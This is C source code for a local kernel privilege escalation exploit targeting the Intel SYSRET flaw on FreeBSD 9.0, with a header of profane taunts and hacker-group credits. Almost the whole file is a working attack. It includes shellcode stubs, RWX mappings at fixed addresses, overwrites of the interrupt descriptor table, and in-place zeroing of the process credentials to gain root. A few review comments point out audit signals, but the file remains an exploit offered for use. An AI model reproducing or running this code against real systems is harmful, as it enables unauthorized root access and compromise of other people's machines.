/*
 * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit
 * Author: CurcolHekerLink
 *
 * This exploit is based on an open source project, so I can make it open source too. Right?
 *
 * If you blame me for open sourcing this exploit, you can fuck your mom. Free of charge :)
 *
 * Credits to KEPEDEAN Corp, Barisan Sakit Hati, ora iso sepaying meneh hekerlink,
 * Kismin perogeremer cyber team, petboylittledick, 1337 Curhat Crew and others at #MamaDedehEliteCurhatTeam
 * if you would like the next private exploit leakage, just mention @MamahhDedeh
 *
 * Some people may feel harmed when we release this exploit :))
 *
 * p.s: Met idul Adha ya besok, saatnya potong leher dewa lo... eh maksudnya potong Sapisisasi :))
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>

/* Byte lengths of the two machine-code stubs that trigger() copies into
 * its mapped pages; each must match the string literal it is paired with. */
enum { TRIGGERSIZE = 20, BOUNCESIZE = 18 };

/* Kernel virtual addresses of the trap handlers Xdiv .. Xxmm, looked up
 * by resolving() through kldsym() and written back into the IDT by
 * resetidt(). */
uintptr_t Xdivp, Xdbgp, Xbptp, Xoflp, Xbndp, Xillp, Xdnap, Xfpusegmp,
          Xtssp, Xmissingp, Xstkp, Xprotp, Xpagep, Xfpup, Xalignp, Xmchkp,
          Xxmmp;

/*
 * Return the base of the current CPU's IDT as a gate_descriptor array.
 *
 * Executes `sidt` (called from user mode by trigger(), so it is assumed
 * to be readable at that privilege level here) and keeps only the base
 * field of the descriptor; the limit is discarded.
 */
struct gate_descriptor * sidt()
{
    struct region_descriptor idtr;

    __asm__ __volatile__ ("sidt %0" : "=m"(idtr));
    return (struct gate_descriptor *)idtr.rd_base;
}

/*
 * Resolve a kernel symbol's address by name through the kldsym(2) syscall.
 *
 * @param symname  NUL-terminated symbol name (not modified; kld_sym_lookup
 *                 simply declares the field as a non-const pointer).
 * @return         the symbol's kernel virtual address.
 *
 * A failed lookup is reported with perror() and ends the process with
 * status 1, so callers never observe an unresolved symbol.
 *
 * NOTE(review): an unprivileged process resolving trap-handler symbols via
 * kldsym() is itself a useful audit signal on hosts where this matters.
 */
u_long matchsym(char *symname)
{
    struct kld_sym_lookup lookup = {
        .version = sizeof lookup,
        .symname = symname,
    };

    if (kldsym(0, KLDSYM_LOOKUP, &lookup) >= 0) {
        return lookup.symvalue;
    }
    perror("kldsym");
    exit(1);
}

/*
 * Write interrupt gate `idx` of `idt` so that it dispatches to `func`.
 *
 * @param idt   base of the IDT (as returned by sidt()).
 * @param idx   vector number whose gate is overwritten; not range-checked.
 * @param func  handler address, split into its low 16 bits and the
 *              remaining high bits as the gate layout requires.
 * @param typ   gate type (the only caller passes SDT_SYSIGT).
 * @param dpl   descriptor privilege level (the only caller passes SEL_KPL).
 * @param ist   interrupt stack table index (the only caller passes 0).
 *
 * The fields are stored straight into live IDT memory, so this can only
 * succeed when executed with kernel privilege; resetidt() is the caller.
 */
void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
{
    struct gate_descriptor *ip;
    ip = idt + idx;
    ip->gd_looffset = func;                     /* low 16 bits of the handler */
    ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL); /* kernel code segment */
    ip->gd_ist = ist;
    ip->gd_xx = 0;                              /* unused bits, cleared */
    ip->gd_type = typ;
    ip->gd_dpl = dpl;
    ip->gd_p = 1;                               /* mark the gate present */
    ip->gd_hioffset = func>>16;                 /* remaining bits of the handler */
}

/*
 * User-mode landing point: resetidt() transfers here with sysretq, using
 * this function's address as the return %rip.  Prints a success banner and
 * terminates the process with status 0; never returns to its caller.
 */
void payload()
{
    fputs("[+] Woohoo!!!\n", stdout);
    exit(0);
}

/*
 * Kernel-privilege stage: repair the IDT, rewrite the calling process's
 * credentials in place, then return to user mode at payload().
 *
 * This is the target the bounce stub written by trigger() jumps to, and it
 * only works if it is already executing in ring 0 with the kernel %gs base
 * in effect; nothing here verifies that, and in user mode the IDT writes
 * would simply fault.
 */
void resetidt()
{
    struct thread *td;
    struct ucred *cred;
    struct gate_descriptor *idt = sidt();

    /* Re-install trap gates 0..19 from the handler addresses resolving()
     * looked up -- presumably because the trap frame pushed during the
     * trigger landed on the IDT (trigger() points the stack pointer into
     * it), clobbering these entries. */
    setidt(idt, IDT_DE, Xdivp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_DB, Xdbgp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_BP, Xbptp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_OF, Xoflp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_BR, Xbndp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_UD, Xillp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_NM, Xdnap, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_FPUGP, Xfpusegmp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_TS, Xtssp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_NP, Xmissingp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_SS, Xstkp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_GP, Xprotp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_PF, Xpagep, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_MF, Xfpup, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_AC, Xalignp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_MC, Xmchkp, SDT_SYSIGT, SEL_KPL, 0);
    setidt(idt, IDT_XF, Xxmmp, SDT_SYSIGT, SEL_KPL, 0);

    /* Current thread: on FreeBSD/amd64 %gs:0 is the per-CPU curthread slot
     * (assumes the kernel %gs base is active, i.e. swapgs already ran). */
    asm ("mov %%gs:0, %0" : "=r"(td));

    /* Zero the effective uid, real uid, real gid and cr_groups[0] (which
     * FreeBSD treats as the effective gid) directly on the ucred, bypassing
     * the kernel's normal credential-change path.  NOTE(review): ucreds are
     * reference counted, so if p_ucred is shared with another process that
     * process changes too -- confirm before relying on this for cleanup or
     * forensic reconstruction. */
    cred = td->td_proc->p_ucred;
    cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
    cred->cr_groups[0] = 0;

    /* Restore the user %gs base and return to ring 3; sysretq takes the new
     * %rip from %rcx, which is loaded with payload.  Does not return. */
    asm ("swapgs; sysretq;" :: "c"(payload));
}

/*
 * Fill the X*p globals with the kernel addresses of the trap handlers
 * Xdiv .. Xxmm, in the same order resetidt() re-installs them.
 *
 * Every name goes through matchsym(), which terminates the process on the
 * first symbol that cannot be resolved, so all slots are valid on return.
 */
void resolving()
{
    static char *const names[] = {
        "Xdiv", "Xdbg", "Xbpt", "Xofl", "Xbnd", "Xill", "Xdna", "Xfpusegm",
        "Xtss", "Xmissing", "Xstk", "Xprot", "Xpage", "Xfpu", "Xalign",
        "Xmchk", "Xxmm",
    };
    uintptr_t *const slots[] = {
        &Xdivp, &Xdbgp, &Xbptp, &Xoflp, &Xbndp, &Xillp, &Xdnap, &Xfpusegmp,
        &Xtssp, &Xmissingp, &Xstkp, &Xprotp, &Xpagep, &Xfpup, &Xalignp,
        &Xmchkp, &Xxmmp,
    };
    size_t count = sizeof names / sizeof names[0];

    for (size_t i = 0; i < count; i++) {
        *slots[i] = (uintptr_t)matchsym(names[i]);
    }
}

/*
 * User-mode stage: build two executable mappings and run the trigger stub.
 *
 * 1. The last page below the 47-bit user address limit holds the trigger
 *    stub in its final TRIGGERSIZE bytes, so its `syscall` is the last
 *    instruction before the boundary.
 * 2. A "bounce" page at 0x900000000 | (low 32 bits of Xpage) holds a stub
 *    that hands control to resetidt().
 *
 * Both are MAP_FIXED, anonymous, RWX mappings at fixed addresses -- a
 * pattern ordinary processes almost never need and a reasonable thing for
 * host auditing to flag.  Does not return on success (the stub never comes
 * back); exits with status 1 if either mmap fails.
 */
void trigger()
{
    printf("[+] Crotz...\n");
    uint64_t pagesize = getpagesize();
    /* Last page below the 47-bit user/kernel boundary. */
    uint8_t * mappedarea = (uint8_t*)((1ULL << 47) - pagesize);
    mappedarea = mmap(mappedarea, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
    if (mappedarea == MAP_FAILED) {
        perror("mmap (trigger)");
        exit(1);
    }

    /* Trigger stub (amd64 machine code, 20 bytes):
     *   mov eax, 0x18       ; syscall number
     *   mov rbx, rsp        ; keep the real stack pointer for the bounce stub
     *   mov rsp, imm64      ; 0xdeadbeefdeadbeef placeholder, patched below
     *   syscall
     */
    char triggerpayload[] =
    "\xb8\x18\x00\x00\x00"
    "\x48\x89\xe3"
    "\x48\xbc\xef\xbe\xad\xde\xef\xbe\xad\xde"
    "\x0f\x05";

    /* Place the stub flush against the end of the page. */
    uint8_t * offset_addr = mappedarea + pagesize - TRIGGERSIZE;
    memcpy(offset_addr, triggerpayload, TRIGGERSIZE);

    /* Patch the mov-rsp immediate (byte offset 10) with an address inside
     * the live IDT: 10*8 bytes past gate 14 (IDT_PF).  Anything the CPU
     * pushes on that "stack" lands on IDT entries, which is why resetidt()
     * re-installs them afterwards. */
    *(uint64_t*)(offset_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
    printf("[+] Crotz...\n");

    /* Bounce stub (amd64 machine code, 18 bytes):
     *   swapgs
     *   mov rsp, rbx        ; back to the stack saved by the trigger stub
     *   mov rax, imm64      ; 0xdeadbeefdeadbeef placeholder, patched below
     *   jmp rax
     */
    char bouncepayload[] =
    "\x0f\x01\xf8"
    "\x48\x89\xdc"
    "\x48\xb8\xef\xbe\xad\xde\xef\xbe\xad\xde"
    "\xff\xe0";

    /* Bouncer address: 0x9 in the high bits, low 32 bits identical to the
     * kernel #PF handler's, presumably so a gate whose high half was
     * clobbered by the pushes above still resolves to this user page. */
    uint8_t * bouncer = (uint8_t*)(0x900000000 | (Xpagep & 0xFFFFFFFF));
    size_t bouncer_allocsize = pagesize;
    /* The 18-byte stub may straddle a page boundary; map two pages if so. */
    if ((uint8_t*)((uint64_t)bouncer & ~(pagesize-1)) + pagesize < bouncer + BOUNCESIZE)
    bouncer_allocsize += pagesize;
    if (mmap((void*)((uint64_t)bouncer & ~(pagesize-1)), bouncer_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
    {
        perror("mmap (bouncer)");
        exit(1);
    }
    memcpy(bouncer, bouncepayload, BOUNCESIZE);
    /* Patch the mov-rax immediate (byte offset 8) with resetidt's address. */
    *(uint64_t*)(bouncer + 8) = (uint64_t)resetidt;
    /* Run the trigger stub; control only comes back through payload(). */
    ((void (*)())offset_addr)();
}

/*
 * Entry point: resolve the kernel symbols, then run the trigger.
 *
 * Command-line arguments are ignored.  The final return is only reached if
 * trigger() comes back, which it does not on success.
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    fputs("[+] SYSRET FUCKUP!!\n", stdout);
    fputs("[+] Start Engine...\n", stdout);
    resolving();
    fputs("[+] Crotz...\n", stdout);
    trigger();
    return 0;
}